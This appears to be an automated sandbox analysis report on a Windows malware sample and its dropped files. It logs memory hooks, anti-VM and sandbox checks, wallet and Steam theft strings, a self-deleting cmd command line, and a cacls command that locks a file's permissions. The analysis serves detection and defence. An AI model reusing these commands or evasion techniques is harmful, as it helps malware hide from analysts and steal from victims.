Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6128 base: 1210005 value: E9 DB F8 A9 75	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6128 base: 76CAF8E0 value: E9 2A 07 56 8A	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6128 base: 1220005 value: E9 FB 42 AB 75	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6128 base: 76CD4300 value: E9 0A BD 54 8A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Memory written: PID: 4948 base: 1340005 value: E9 FB 99 5A 76
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Memory written: PID: 4948 base: 778E9A00 value: E9 0A 66 A5 89
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Memory written: PID: 4948 base: 1350007 value: E9 7B 4C 5D 76
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Memory written: PID: 4948 base: 77924C80 value: E9 8E B3 A2 89
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	Memory written: PID: 3920 base: 7FFC32240008 value: E9 7B A9 EA FF
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	Memory written: PID: 3920 base: 7FFC320EA980 value: E9 90 56 15 00
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	Memory written: PID: 3920 base: 7FFC3225000D value: E9 6B 9B EC FF
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	Memory written: PID: 3920 base: 7FFC32119B70 value: E9 AA 64 13 00
Source: C:\Users\user\1000018002\avicapn32.exe	Memory written: PID: 1112 base: 1C70005 value: E9 FB 99 C7 75
Source: C:\Users\user\1000018002\avicapn32.exe	Memory written: PID: 1112 base: 778E9A00 value: E9 0A 66 38 8A
Source: C:\Users\user\1000018002\avicapn32.exe	Memory written: PID: 1112 base: 1C90007 value: E9 7B 4C C9 75
Source: C:\Users\user\1000018002\avicapn32.exe	Memory written: PID: 1112 base: 77924C80 value: E9 8E B3 36 8A
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 2820 base: FB0005 value: E9 FB 99 93 76
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 2820 base: 778E9A00 value: E9 0A 66 6C 89
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 2820 base: FC0007 value: E9 7B 4C 96 76
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 2820 base: 77924C80 value: E9 8E B3 69 89
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 2820 base: FD0005 value: E9 FB BF 8E 76
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 2820 base: 778BC000 value: E9 0A 40 71 89
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 2820 base: 1170008 value: E9 AB E0 78 76
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 2820 base: 778FE0B0 value: E9 60 1F 87 89
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 2820 base: 1180005 value: E9 CB 5A 78 73
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 2820 base: 74905AD0 value: E9 3A A5 87 8C
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 2820 base: 1190005 value: E9 5B B0 79 73
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 2820 base: 7492B060 value: E9 AA 4F 86 8C
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 2820 base: 11A0005 value: E9 DB F8 B0 75
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 2820 base: 76CAF8E0 value: E9 2A 07 4F 8A
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 2820 base: 11B0005 value: E9 FB 42 B2 75
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 2820 base: 76CD4300 value: E9 0A BD 4D 8A

Overwrites code with function prologues

Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6128 base: 778BC000 value: 8B FF 55 8B EC	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6128 base: 74905AD0 value: 8B FF 55 8B EC	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6128 base: 7492B060 value: 8B FF 55 8B EC	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6128 base: 76CAF8E0 value: 8B FF 55 8B EC	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6128 base: 76CD4300 value: 8B FF 55 8B EC	Jump to behavior

Self deletion via cmd or bat file

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Process created: "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\Desktop\DQxttu2Qrr.exe" & exit
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Process created: "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\Desktop\DQxttu2Qrr.exe" & exit			Jump to behavior

Found hidden mapped module (file has been removed from disk)

Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe

Module Loaded: C:\USERS\user\LOCKTIME\RTKAUDUSERVICE64.EXE

Uses cacls to modify the permissions of files

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:N"

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\61312899942613011832.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\1000018002\avicapn32.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Users\user\1000018002\avicapn32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	System information queried: FirmwareTableInformation	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	System information queried: FirmwareTableInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	System information queried: FirmwareTableInformation

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Emit64.exe, 0000001A.00000002.464895323.00000014243FC000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: umciavi64.exe, 00000031.00000003.619550432.000000000F2F1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VCRUNTIME140.DLLSOFTOKN3.DLLNSS3.DLLMSVCP140.DLLMOZGLUE.DLLFREEBL3.DLL\SOFT\STEAM\\CONFIG\\|UPDATEHTTPANALYZERSTDV7.EXEWIRESHARK.EXEHTTP ANALYZERCOMSTONESNOWBIGWALETS%S\%S\%S\%S\%S%S\%S\%S\%S.EXODUS\EXODUS.WALLET.JSONEXODUS\BACKUPS\EXODUS\BACKUPSHTTP200
Source: umciavi64.exe, 00000031.00000003.619550432.000000000F2F1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: WIRESHARK.EXE

Tries to evade analysis by execution special instruction (VM detection)

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Special instruction interceptor: First address: 0000000001690363 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Special instruction interceptor: First address: 00000000015D656D instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: C:\ProgramData\61312899942613011832.exe	Special instruction interceptor: First address: 00000000017925FE instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Special instruction interceptor: First address: 0000000000A125FE instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	Special instruction interceptor: First address: 00007FF676892A58 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	Special instruction interceptor: First address: 00007FF676892A96 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: C:\Users\user\1000018002\avicapn32.exe	Special instruction interceptor: First address: 00000000016299BA instructions rdtsc caused by: RDTSC with Trap Flag (TF)

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	RDTSC instruction interceptor: First address: 000000000176B0FE second address: 000000000176B10D instructions: 0x00000000 rdtsc 0x00000002 inc cl 0x00000004 not dh 0x00000006 neg cl 0x00000008 mov dl, 15h 0x0000000a dec cl 0x0000000c sub ax, di 0x0000000f rdtsc
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	RDTSC instruction interceptor: First address: 00000000014D7B49 second address: 00000000014D7B51 instructions: 0x00000000 rdtsc 0x00000002 inc ecx 0x00000003 movzx ecx, si 0x00000006 inc ecx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	RDTSC instruction interceptor: First address: 00000000016693EB second address: 0000000001669432 instructions: 0x00000000 rdtsc 0x00000002 dec ecx 0x00000003 xchg eax, edi 0x00000004 inc ecx 0x00000005 pop eax 0x00000006 dec eax 0x00000007 cmovbe eax, eax 0x0000000a inc cx 0x0000000c xchg esp, ebx 0x0000000e inc ecx 0x0000000f pop edx 0x00000010 inc ecx 0x00000011 xchg bh, cl 0x00000013 dec eax 0x00000014 cwde 0x00000015 cdq 0x00000016 inc ecx 0x00000017 pop edi 0x00000018 pop ecx 0x00000019 inc bp 0x0000001b movsx esp, dl 0x0000001e cwd 0x00000020 lahf 0x00000021 inc ecx 0x00000022 pop ecx 0x00000023 inc ecx 0x00000024 movzx ebx, si 0x00000027 inc eax 0x00000028 setb bh 0x0000002b inc cx 0x0000002d xchg esp, ebx 0x0000002f pop esi 0x00000030 movzx eax, bp 0x00000033 inc cx 0x00000035 movsx eax, al 0x00000038 pop edi 0x00000039 pop ebx 0x0000003a setb ah 0x0000003d inc ebp 0x0000003e movzx esi, ax 0x00000041 inc ecx 0x00000042 pop esp 0x00000043 dec esp 0x00000044 movzx esi, ax 0x00000047 rdtsc
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	RDTSC instruction interceptor: First address: 00000000016D9DA1 second address: 00000000014DE6C8 instructions: 0x00000000 rdtsc 0x00000002 cdq 0x00000003 pop ebp 0x00000004 dec esp 0x00000005 arpl dx, ax 0x00000007 dec ecx 0x00000008 cmovb edi, ecx 0x0000000b inc ecx 0x0000000c pop ebx 0x0000000d inc ebp 0x0000000e mov bh, bh 0x00000010 dec ecx 0x00000011 arpl dx, cx 0x00000013 inc ecx 0x00000014 pop eax 0x00000015 cbw 0x00000017 dec eax 0x00000018 movsx ecx, di 0x0000001b dec ebp 0x0000001c cmovle esi, eax 0x0000001f inc ecx 0x00000020 pop edx 0x00000021 cbw 0x00000023 jmp 00007FB5AC78D92Ch 0x00000028 inc ecx 0x00000029 pop edi 0x0000002a inc esp 0x0000002b movzx ecx, si 0x0000002e pop ecx 0x0000002f cwde 0x00000030 rdtsc
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	RDTSC instruction interceptor: First address: 000000000176451B second address: 000000000176452D instructions: 0x00000000 rdtsc 0x00000002 inc ecx 0x00000003 pop edx 0x00000004 dec ecx 0x00000005 movzx ebx, ax 0x00000008 inc ecx 0x00000009 pop edi 0x0000000a cbw 0x0000000c pop ecx 0x0000000d inc eax 0x0000000e mov dh, dh 0x00000010 inc ecx 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	RDTSC instruction interceptor: First address: 000000000176452D second address: 000000000176453B instructions: 0x00000000 rdtsc 0x00000002 inc cx 0x00000004 bswap esi 0x00000006 pop esi 0x00000007 inc esp 0x00000008 mov ah, dl 0x0000000a pop edi 0x0000000b dec esp 0x0000000c arpl bp, si 0x0000000e rdtsc
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	RDTSC instruction interceptor: First address: 00000000016FA149 second address: 0000000001BA06F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB5ACE2F84Fh 0x00000007 inc ecx 0x00000008 pop ecx 0x00000009 pop esi 0x0000000a inc ecx 0x0000000b mov bl, bl 0x0000000d pop edi 0x0000000e movsx eax, bp 0x00000011 rdtsc
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	RDTSC instruction interceptor: First address: 000000000173E4D5 second address: 0000000001696CB2 instructions: 0x00000000 rdtsc 0x00000002 pop ecx 0x00000003 cwd 0x00000005 inc ecx 0x00000006 pop ecx 0x00000007 lahf 0x00000008 pop esi 0x00000009 pop edi 0x0000000a lahf 0x0000000b dec ebp 0x0000000c arpl bp, sp 0x0000000e pop ebx 0x0000000f jmp 00007FB5AC8E17FCh 0x00000014 inc ecx 0x00000015 pop esp 0x00000016 rdtsc
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	RDTSC instruction interceptor: First address: 00000000016C0841 second address: 000000000172F30A instructions: 0x00000000 rdtsc 0x00000002 inc esp 0x00000003 movsx ebp, bx 0x00000006 inc ecx 0x00000007 pop ebp 0x00000008 inc bp 0x0000000a movzx edi, cl 0x0000000d pop ebp 0x0000000e inc ecx 0x0000000f pop ebx 0x00000010 inc ecx 0x00000011 pop eax 0x00000012 inc ecx 0x00000013 pop edx 0x00000014 inc ebp 0x00000015 movsx edi, dx 0x00000018 dec ebp 0x00000019 arpl si, si 0x0000001b dec eax 0x0000001c movzx edx, di 0x0000001f inc ecx 0x00000020 pop edi 0x00000021 mov si, 6F30h 0x00000025 dec eax 0x00000026 cdq 0x00000027 dec eax 0x00000028 movsx ebx, bp 0x0000002b pop ecx 0x0000002c jmp 00007FB5AC9F7D3Ch 0x00000031 inc ecx 0x00000032 pop ecx 0x00000033 cdq 0x00000034 inc cx 0x00000036 movsx eax, dh 0x00000039 inc esp 0x0000003a movsx esp, bp 0x0000003d pop esi 0x0000003e cbw 0x00000040 pop edi 0x00000041 pop ebx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	RDTSC instruction interceptor: First address: 000000000172F30A second address: 000000000172F310 instructions: 0x00000000 rdtsc 0x00000002 inc ecx 0x00000003 pop esp 0x00000004 cwd 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	RDTSC instruction interceptor: First address: 00000000016B2E25 second address: 00000000016B2E5E instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 mov edi, 61C07295h 0x00000009 inc ecx 0x0000000a pop eax 0x0000000b dec eax 0x0000000c cdq 0x0000000d dec ebp 0x0000000e movsx esp, sp 0x00000011 lahf 0x00000012 inc ecx 0x00000013 pop edx 0x00000014 dec eax 0x00000015 cdq 0x00000016 inc ecx 0x00000017 pop edi 0x00000018 movzx ax, ah 0x0000001c cwd 0x0000001e cdq 0x0000001f pop ecx 0x00000020 inc ecx 0x00000021 pop ecx 0x00000022 inc esp 0x00000023 movzx esp, di 0x00000026 inc ebp 0x00000027 movsx esp, dx 0x0000002a inc ecx 0x0000002b xchg dh, al 0x0000002d pop esi 0x0000002e cbw 0x00000030 dec ecx 0x00000031 arpl sp, bx 0x00000033 inc cx 0x00000035 movzx eax, bl 0x00000038 pop edi 0x00000039 rdtsc
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	RDTSC instruction interceptor: First address: 00000000010EEF30 second address: 00000000010EEF3F instructions: 0x00000000 rdtsc 0x00000002 inc cl 0x00000004 not dh 0x00000006 neg cl 0x00000008 mov dl, 15h 0x0000000a dec cl 0x0000000c sub ax, di 0x0000000f rdtsc
Source: C:\ProgramData\61312899942613011832.exe	RDTSC instruction interceptor: First address: 00000000017925FE second address: 00000000017B33CF instructions: 0x00000000 rdtsc 0x00000002 nop 0x00000003 call 00007FB5AC944211h 0x00000008 call 00007FB5AC8E2A91h 0x0000000d mov dword ptr [esp+04h], 7A546ADEh 0x00000015 lea esp, dword ptr [esp+04h] 0x00000019 call 00007FB5ACA9592Ah 0x0000001e push edx 0x0000001f push eax 0x00000020 cmovnl eax, ebp 0x00000023 push ebp 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	RDTSC instruction interceptor: First address: 0000000000A125FE second address: 0000000000A333CF instructions: 0x00000000 rdtsc 0x00000002 nop 0x00000003 call 00007FB5AC943F91h 0x00000008 call 00007FB5AC8E2811h 0x0000000d mov dword ptr [esp+04h], 7A546ADEh 0x00000015 lea esp, dword ptr [esp+04h] 0x00000019 call 00007FB5ACA956AAh 0x0000001e push edx 0x0000001f push eax 0x00000020 cmovnl eax, ebp 0x00000023 push ebp 0x00000024 rdtsc
